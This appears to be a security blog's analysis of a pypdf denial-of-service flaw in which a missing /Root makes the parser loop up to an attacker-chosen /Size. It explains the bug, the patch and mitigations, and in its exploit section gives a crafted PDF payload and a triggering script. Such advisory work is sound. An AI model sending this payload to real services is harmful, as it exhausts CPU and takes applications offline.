Infinite Loops in the Library: Breaking pypdf with Polite Parsing
Jan 11, 2026·5 min read
Executive Summary (TL;DR)
pypdf attempts to be helpful by recovering broken PDFs that lack a valid Root object. However, it determines how hard to search based on the file's own metadata (`/Size`). An attacker can set this size to billions, forcing the library into an infinite CPU-consuming loop looking for a phantom object.
A Denial of Service vulnerability in the pypdf library caused by an uncontrolled loop during the recovery of malformed PDF files.
The Hook: Kindness Kills
There is an old adage in software engineering known as Postel's Law: "Be conservative in what you do, be liberal in what you accept from others." It sounds noble. It sounds robust. In the security world, however, we often call this "attack surface expansion."
pypdf, one of the most popular Python libraries for manipulating PDFs (used in everything from banking OCR pipelines to those trendy AI RAG chatbots), fell victim to its own benevolence. When you feed pypdf a pristine PDF, it works great. But when you feed it a broken PDF—specifically one missing its Document Catalog (the /Root)—it doesn't just error out. It tries to fix it for you.
This recovery mechanism is the heart of CVE-2026-22690. The library assumes that if the map is broken, it can just walk the entire territory to find the destination. The problem? The attacker gets to define the size of the territory.
The Flaw: Trusting the Map Legend
To understand this bug, you need to know a tiny bit about PDF structure. A PDF ends with a trailer dictionary. This trailer tells the parser where to find the xref table (the index of objects) and, crucially, which object is the /Root. The /Root is the entry point to the document hierarchy.
But what if the /Root key is missing? In default mode (non-strict), pypdf engages a fallback routine. It decides to iterate through every possible object ID to see if it looks like a Catalog.
Here is the fatal logic error: To know how many objects to scan, pypdf looks at the /Size key in the trailer. This key is supposed to represent the total number of objects in the file. Since the trailer is user-controlled input, an attacker can set /Size to 2,147,483,647 (INT_MAX) without actually providing that many objects.
When pypdf sees this, it essentially says, "Okay, I will now attempt to parse and validate 2 billion objects to find your missing root." It loops. It fails to find an object. It catches the exception. It loops again. This burns CPU cycles faster than a crypto miner, locking up the thread indefinitely.
The Code: The Smoking Gun
Let's look at the vulnerable logic in pypdf/_reader.py. This is a classic case of an unbounded loop controlled by untrusted input.
# VULNERABLE CODE (Simplified)
# The 'nb' variable is taken directly from the file trailer
nb = cast(int, self.trailer.get("/Size", 0))
# The loop runs from 0 to the attacker-supplied size
for i in range(nb):
try:
# Attempt to parse object #i
o = self.get_object(i + 1)
except Exception:
# If it fails, swallow the error and keep going
o = None
# Check if we accidentally found the Root
if isinstance(o, DictionaryObject) and o.get("/Type") == "/Catalog":
self._validated_root = o
breakIf I give you a file that is 1KB in size, but I set /Size to 100,000,000, this loop runs 100 million times. The try/except block makes it worse because exception handling in Python is relatively expensive compared to standard control flow.
The fix, applied in commit 294165726b646bb7799be1cc787f593f2fdbcf45, introduces sanity. It caps the benevolence:
# PATCHED CODE
# Set a hard limit on how nice we are willing to be
limit = self.root_object_recovery_limit # defaults to 10,000
for i in range(nb):
if i > limit:
raise LimitReachedError("Root object not found within limit")
# ... existing logic ...They also optimized the search mechanism, but the hard limit is the real mitigation here.
The Exploit: Crafting the Death PDF
You don't need complex fuzzing tools to exploit this. You just need a text editor. A PDF is partially ASCII, and the trailer is usually readable at the end of the file.
Here is the recipe for a denial-of-service payload:
- Take a valid, minimal PDF.
- Delete the
/Rootentry from the trailer dictionary. - Set the
/Sizeentry to a massive integer.
Your file might look like this:
%PDF-1.7
1 0 obj
<< /Type /Page >>
endobj
xref
0 1
0000000000 65535 f
trailer
<<
/Size 999999999 % <--- The Weapon
% /Root is intentionally missing
>>
startxref
10
%%EOFWhen a victim script runs:
from pypdf import PdfReader
reader = PdfReader("malicious.pdf")
# Triggers the property access
print(reader.pages[0]) The process will hang. On a single core, it pins the CPU to 100%. In a web server context (like Gunicorn or uWSGI), sending a few of these requests will starve all worker threads, effectively taking the application offline.
The Mitigation: Stop the Bleeding
The primary fix is to upgrade pypdf. Version 6.6.0 introduces the root_object_recovery_limit which defaults to 10,000. This turns an infinite hang into a split-second search that fails gracefully.
If you cannot upgrade immediately (perhaps you are pinned to an older version due to dependencies), you have a configuration-level workaround: Strict Mode.
# Workaround for older versions
reader = PdfReader("untrusted.pdf", strict=True)When strict=True is set, pypdf refuses to engage in the "guess the root object" game. If the /Root is missing from the trailer, it raises an exception immediately rather than entering the vulnerable recovery loop.
[!NOTE] This vulnerability highlights a crucial lesson for parser developers: Never loop on user-controlled integers without an upper bound. Trusting metadata to define loop constraints is a recipe for resource exhaustion.
Official Patches
Fix Analysis (1)
Technical Appendix
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:UAffected Systems
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
pypdf py-pdf | < 6.6.0 | 6.6.0 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-400 |
| Attack Vector | Network (via File Upload) |
| CVSS v4 | 2.7 (Low) |
| Impact | Denial of Service (CPU Exhaustion) |
| EPSS Score | 0.00042 (Low Probability) |
| Patch Status | Released (v6.6.0) |
MITRE ATT&CK Mapping
The product does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources.
Known Exploits & Detection
Vulnerability Timeline
Subscribe to updates
Get the latest CVE analysis reports delivered to your inbox.